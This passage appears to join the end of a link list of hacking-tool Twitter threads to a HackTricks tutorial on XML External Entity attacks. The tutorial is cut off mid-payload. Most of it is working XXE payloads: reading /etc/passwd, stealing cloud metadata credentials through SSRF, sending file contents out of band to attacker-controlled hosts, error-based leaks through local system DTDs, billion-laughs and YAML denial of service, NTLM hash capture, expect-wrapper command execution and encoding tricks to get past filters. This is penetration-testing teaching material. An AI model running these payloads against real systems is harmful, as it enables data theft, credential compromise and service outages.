Sheet): https://twitter.com/cry__pto/status/1264530546933272576 -1968-#BugBounty tools part (4): https://twitter.com/cry__pto/status/1212296173412851712 -1969--Automated enumeration tools: https://twitter.com/cry__pto/status/1214919232389099521 -1970-DNS lookup information Tools: https://twitter.com/cry__pto/status/1248639962746105863 -1971-OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1972-Social Engineering Tools: https://twitter.com/cry__pto/status/1180731438796333056 -1973-Hydra : https://twitter.com/cry__pto/status/1247507926807449600 -1974-#OSINT Your Full Guide: https://twitter.com/cry__pto/status/1244433669936349184 -1975-#BugBounty tools part (2): https://twitter.com/cry__pto/status/1212289852059860992 -1976-my own ebook library: https://twitter.com/cry__pto/status/1239308541468516354 -1977-Practice part (2): https://twitter.com/cry__pto/status/1213165695556567040 -1978-Practice part (3): https://twitter.com/cry__pto/status/1214220715337097222 -1979-my blog: https://twitter.com/cry__pto/status/1263457516672954368 -1980-Practice: https://twitter.com/cry__pto/status/1212341774569504769 -1981-how to search for XSS without proxy tool: https://twitter.com/cry__pto/status/1252558806837604352 -1982-How to collect email addresses from search engines: https://twitter.com/cry__pto/status/1058864931792138240 -1983-Hacking Tools Cheat Sheet: https://twitter.com/cry__pto/status/1255159507891687426 -1984-#OSCP Your Full Guide: https://twitter.com/cry__pto/status/1240842587927445504 -1985-#HackTheBox Your Full Guide: https://twitter.com/cry__pto/status/1241481478539816961 -1986-Web Scanners: https://twitter.com/cry__pto/status/1271826773009928194 -1987-HACKING MAGAZINES: -1-2600 — The Hacker Quarterly magazine:www.2600.com -2-Hackin9:http://hakin9.org -3-(IN)SECURE magazine:https://lnkd.in/grNM2t8 -4-PHRACK:www.phrack.org/archives -5-Hacker’s Manual 2019 -1988-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1989-Kali Linux Cheat Sheet for Hackers: https://twitter.com/cry__pto/status/1272792311236263937 -1990-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1992-100 Best Hacking Tools for Security Professionals in 2020: https://gbhackers.com/hacking-tools-list/ -1993-SNMP Enumeration: OpUtils:www.manageengine.com SNMP Informant:www.snmp-informant.com SNMP Scanner:www.secure-bytes.com SNMPUtil:www.wtcs.org SolarWinds:www.solarwinds.com -1994-INFO-SEC RELATED CHEAT SHEETS: https://twitter.com/cry__pto/status/1274768435361337346 -1995-METASPLOIT CHEAT SHEET: https://twitter.com/cry__pto/status/1274769179548278786 -1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus: https://twitter.com/cry__pto/status/1275359087304286210 -1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More: https://twitter.com/cry__pto/status/1276391703906222080 -1998-learn penetration testing a great series as PDF: https://twitter.com/cry__pto/status/1277588369426526209 -1999-Detecting secrets in code committed to Gitlab (in real time): https://www.youtube.com/watch?v=eCDgUvXZ_YE -2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants: https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html -2001-Building Virtual Machine Labs: https://github.com/da667/Building_Virtual_Machine_Labs-Live_Training -2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]: https://kakyouim.hatenablog.com/entry/2020/05/27/010807 -2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools): https://softwaretestinghelp.com/penetration-testing-tools/ -2004-Full Connect Scan (-sT): -complete the three-way handshake -slower than SYN scan -no need for superuser Privileges -when stealth is not required -to know for sure which port is open -when running port scan via proxies like TOR -it can be detected nmap -sT -p 80 192.168.1.110 -2005-today i learned that you can use strings command to extract email addresses from binary files: strings -n 8 /usr/bin/who | grep '@'
# XXE - XEE - XML External Entity <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details> An XML External Entity attack is a type of attack against an application that parses XML input. ## XML Basics **Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities) ### What is XML? <a href="#what-is-xml" id="what-is-xml"></a> XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format (the "X" in "AJAX" stands for "XML"). But its popularity has now declined in favor of the JSON format. ### What are XML entities? <a href="#what-are-xml-entities" id="what-are-xml-entities"></a> XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities `&lt;` and `&gt;` represent the characters `<` and `>`. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data. ### What are XML elements? Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example: * `<!ELEMENT stockCheck ANY>` Means that any object could be inside the parent `<stockCheck></stockCheck>` * \<!ELEMENT stockCheck EMPTY> Means that it should be empty `<stockCheck></stockCheck>` * \<!ELEMENT stockCheck (productId,storeId)> Declares that `<stockCheck>` can have the children `<productId>` and `<storeId>` ### What is document type definition? <a href="#what-is-document-type-definition" id="what-is-document-type-definition"></a> The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional `DOCTYPE` element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two. ### What are XML custom entities? <a href="#what-are-xml-custom-entities" id="what-are-xml-custom-entities"></a> XML allows custom entities to be defined within the DTD. For example: `<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>` This definition means that any usage of the entity reference `&myentity;` within the XML document will be replaced with the defined value: "`my entity value`". ### What are XML external entities? <a href="#what-are-xml-external-entities" id="what-are-xml-external-entities"></a> XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the `SYSTEM` keyword and must specify a URL from which the value of the entity should be loaded. For example: `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>` The URL can use the `file://` protocol, and so external entities can be loaded from file. For example: `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>` XML external entities provide the primary means by which [XML external entity attacks](https://portswigger.net/web-security/xxe) arise. ### What are XML Parameter entities? Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name: `<!ENTITY % myparameterentity "my parameter entity value" >` And second, parameter entities are referenced using the percent character instead of the usual ampersand: `%myparameterentity;` This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows: `<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>` This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful. ## Main attacks [Most of these attacks were tested using the awesome Portswiggers XEE labs: https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) ### New Entity test In this attack I'm going to test if a simple new ENTITY declaration is working ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY toreplace "3"> ]> <stockCheck> <productId>&toreplace;</productId> <storeId>1</storeId> </stockCheck> ``` ![](<../.gitbook/assets/image (220).png>) ### Read file Lets try to read `/etc/passwd` in different ways. For Windows you could try to read: `C:\windows\system32\drivers\etc\hosts` In this first case notice that SYSTEM "_\*\*file:///\*\*etc/passwd_" will also work. ```markup <!--?xml version="1.0" ?--> <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]> <data>&example;</data> ``` ![](<../.gitbook/assets/image (221).png>) This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs) ```markup <!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]> <data>&example;</data> ``` In this third case notice we are declaring the `Element stockCheck` as ANY ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ELEMENT stockCheck ANY> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <stockCheck> <productId>&file;</productId> <storeId>1</storeId> </stockCheck3> ``` ![](<../.gitbook/assets/image (222) (1).png>) ### Directory listing In **Java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like (just asking for the directory instead of the file): ```markup <!-- Root / --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root> <!-- /etc/ --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root> ``` ### SSRF An XXE could be used to abuse a SSRF inside a cloud ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> ``` ### Blind SSRF Using the **previously commented technique** you can make the server access a server you control to show it's vulnerable. But, if that's not working, maybe is because **XML entities aren't allowed**, in that case you could try using **XML parameter entities**: ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]> <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck> ``` ### "Blind" SSRF - Exfiltrate data out-of-band **In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via** _**ftp://**_**). This explanation as taken from** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.** An example of a malicious DTD to exfiltrate the contents of the `/etc/hostname` file is as follows: ```markup <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>"> %eval; %exfiltrate; ``` This DTD carries out the following steps: * Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file. * Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `exfiltrate`. The `exfiltrate` entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the `file` entity within the URL query string. * Uses the `eval` entity, which causes the dynamic declaration of the `exfiltrate` entity to be performed. * Uses the `exfiltrate` entity, so that its value is evaluated by requesting the specified URL. The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL:\ `http://web-attacker.com/malicious.dtd` Finally, the attacker must submit the following XXE payload to the vulnerable application: ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]> <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck> ``` This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server. ### Error Based(External DTD) **In this case we are going to make the server loads a malicious DTD that will show the content of a file inside an error message (this is only valid if you can see error messages).** [**Example from here.**](https://portswigger.net/web-security/xxe/blind) You can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using a malicious external DTD as follows: ```markup <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` This DTD carries out the following steps: * Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file. * Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `error`. The `error` entity will be evaluated by loading a nonexistent file whose name contains the value of the `file` entity. * Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed. * Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file. Invoke the external DTD error with: ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]> <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck> ``` And you should see the contents of the file inside error message of the response of the web server. ![](<../.gitbook/assets/image (223) (1).png>) _**Please notice that external DTD allows us to include one entity inside the second (****`eval`****), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_ ### **Error Based (system DTD)** So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** (external connections aren't available)?. [Information from here](https://portswigger.net/web-security/xxe/blind). In this situation, it might still be possible to **trigger error messages containing sensitive data**, due to a loophole in the XML language specification. If a document's **DTD uses a hybrid of internal and external DTD** declarations, then the **internal DTD can redefine entities that are declared in the external DTD**. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed. This means that an attacker can employ the **error-based XXE technique from within an internal DTD**, provided the XML parameter entity that they use is **redefining an entity that is declared within an external DTD**. Of course, if out-of-band connections are blocked, then the external DTD cannot be loaded from a remote location. Instead, it needs to be an **external DTD file that is local to the application server**. _Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data._ For example, suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. An attacker can trigger an XML parsing error message containing the contents of the `/etc/passwd` file by submitting a hybrid DTD like the following: ```markup <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]> ``` This DTD carries out the following steps: * Defines an XML parameter entity called `local_dtd`, containing the contents of the external DTD file that exists on the server filesystem. * Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages) that was already described, for triggering an error message containing the contents of the `/etc/passwd` file. * Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message. **Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso` ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]> <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck> ``` ![](<../.gitbook/assets/image (224).png>) As this technique uses an **internal DTD you need to find a valid one first**. You could do this **installing** the same **OS / Software** the server is using and **searching some default DTDs**, or **grabbing a list** of **default DTDs** inside systems and **check** if any of them exists: ```markup <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]> ``` ### Finding DTDs inside the system In the following awesome github repo you can find **paths of DTDs that can be present in the system**: {% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %} Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how. ```bash java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar Scanning TAR file /tmp/dadocker.tar [=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd Testing 0 entities : [] [=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd Testing 0 entities : [] ``` ### XXE via Office Open XML Parsers (Copied from [**here**](https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/))\ Many web applications allow you to upload Microsoft Office documents, and then they parse some details out of them. For example, you might have a web application that allows you to import data by uploading a spreadsheet in XLSX format. At some point, in order for the parser to extract the data from the Spreadsheet, the parser is going to need to **parse at least one XML file**. The only way to test for this is to generate a **Microsoft Office file that contains an XXE payload**, so let’s do that. First, create an empty directory to unzip your document to, and unzip it! ``` test$ ls test.docx test$ mkdir unzipped test$ unzip ./test.docx -d ./unzipped/ Archive: ./test.docx inflating: ./unzipped/word/numbering.xml inflating: ./unzipped/word/settings.xml inflating: ./unzipped/word/fontTable.xml inflating: ./unzipped/word/styles.xml inflating: ./unzipped/word/document.xml inflating: ./unzipped/word/_rels/document.xml.rels inflating: ./unzipped/_rels/.rels inflating: ./unzipped/word/theme/theme1.xml inflating: ./unzipped/[Content_Types].xml ``` Open up `./unzipped/word/document.xml` in your favourite text editor (vim) and edit the **XML to contain your favourite XXE payload**. The first thing I try tends to be a HTTP request, like this: ``` <!DOCTYPE x [ <!ENTITY test SYSTEM "http://[ID].burpcollaborator.net/"> ]> <x>&test;</x> ``` Those lines should be inserted in between the two root XML objects, like this, and of course you will need to replace the URL with a URL that you can monitor for requests: ![Those lines should be inserted in between the two root XML objects, like thi](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-obscure.png) All that is left is to **zip the file up to create your evil poc.docx file**. From the “unzipped” directory that we created earlier, run the following: ![From the "unzipped" directory that we created earlier, run the following:](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-unzipped.png) Now upload the file to your (hopefully) vulnerable web application and pray to the hacking gods for a request in your Burp Collaborator logs. ### Jar: protocol The `jar` protocol is only available on **Java applications**. It allows to access files inside a **PKZIP** file (`.zip`, `.jar`, ...) and works for local and remote files: ``` jar:file:///var/myarchive.zip!/file.txt jar:https://download.host.com/myarchive.zip!/file.txt ``` {% hint style="danger" %} To be able to access files inside PKZIP files is **super useful to abuse XXE via system DTD files.** Check [this section to learn how to abuse system DTD files](xxe-xee-xml-external-entity.md#error-based-system-dtd). {% endhint %} #### Behind the scenes 1. It makes an HTTP request to load the zip archive. `https://download.host.com/myarchive.zip` 2. It saves the HTTP response to a temporary location. `/tmp/...` 3. It extracts of the archive. 4. It reads the `file.zip` 5. It delete temporary files. Note that it's possible to stop the flow in the second step. The trick is to never close the connection when serving the file. [This tools can be useful](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution): one in python `slow_http_server.py` and one in java`slowserver.jar`. Once the server has downloaded your file, you need to find its location by browsing the temp directory. Being random, the file path can't be predict in advance. ![Jar](https://gosecure.github.io/xxe-workshop/img/74fac3155d455980.png) {% hint style="danger" %} Writing files in a temporary directory can help to **escalate another vulnerability that involves a path traversal** (such as local file include, template injection, XSLT RCE, deserialization, etc). {% endhint %} ### XSS ```markup <![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]> ``` ### DoS #### Billion Laugh Attack ```markup <!DOCTYPE data [ <!ENTITY a0 "dos" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> ]> <data>&a4;</data> ``` #### Yaml Attack ```markup a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` #### Quadratic Blowup Attack ![](<../.gitbook/assets/image (531).png>) #### Getting NTML On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler: ``` Responder.py -I eth0 -v ``` and by sending the following request ``` <!--?xml version="1.0" ?--> <!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]> <data>&example;</data> ``` Then you can try to crack the hash using hashcat ## Hidden XXE Surfaces ### XInclude [From here.](https://portswigger.net/web-security/xxe) Some applications **receive client-submitted data, embed it on the server-side into an XML document, and then parse the document**. An example of this occurs when client-submitted data is placed into a **backend SOAP request**, which is then processed by the backend SOAP service. In this situation, you cannot carry out a classic XXE attack, because **you don't control the entire XML** document and so cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead. `XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. To perform an `XInclude` attack, you need to reference the `XInclude` namespace and provide the path to the file that you wish to include. For example: ```markup productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1 ``` ### SVG - File Upload [From here.](https://portswigger.net/web-security/xxe) Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG. For example, an application might allow users to **upload images**, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the **image processing library that is being used might support SVG images**. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities. ```markup <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg> ``` You could also try to **execute commands** using the PHP "expect" wrapper: ```markup <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <image xlink:href="expect://ls"></image> </svg> ``` **Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.** ### **PDF - File upload** Read the following post to **learn how to exploit a XXE uploading a PDF** file: {% content-ref url="file-upload/pdf-upload-xxe-and-cors-bypass.md" %} [pdf-upload-xxe-and-cors-bypass.md](file-upload/pdf-upload-xxe-and-cors-bypass.md) {% endcontent-ref %} ### Content-Type: From x-www-urlencoded to XML If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following: ```markup POST /action HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 7 foo=bar ``` Then you might be able submit the following request, with the same result: ```markup POST /action HTTP/1.0 Content-Type: text/xml Content-Length: 52 <?xml version="1.0" encoding="UTF-8"?><foo>bar</foo> ``` ### Content-Type: From JSON to XEE To change the request you could use a Burp Extension named “**Content Type Converter**“. [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example: ```markup Content-Type: application/json;charset=UTF-8 {"root": {"root": { "firstName": "Avinash", "lastName": "", "country": "United States", "city": "ddd", "postalCode": "ddd" }}} ``` ```markup Content-Type: application/xml;charset=UTF-8 <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]> <root> <root> <firstName>&xxe;</firstName> <lastName/> <country>United States</country> <city>ddd</city> <postalCode>ddd</postalCode> </root> </root> ``` Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2). ## WAF & Protections Bypasses ### Base64 ```markup <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/> ``` This only work if the XML server accepts the `data://` protocol. ### UTF-7 You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7. ```markup <!xml version="1.0" encoding="UTF-7"?--> +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4- ``` ```markup <?xml version="1.0" encoding="UTF-7"?> +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` ### File:/ Protocol Bypass If the web is using PHP, instead of using `file:/` you can use **php wrappers**`php://filter/convert.base64-encode/resource=` to **access internal files**. If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol). ### HTML Entities Trick from [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\ You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.\ Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)). ```markup <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a 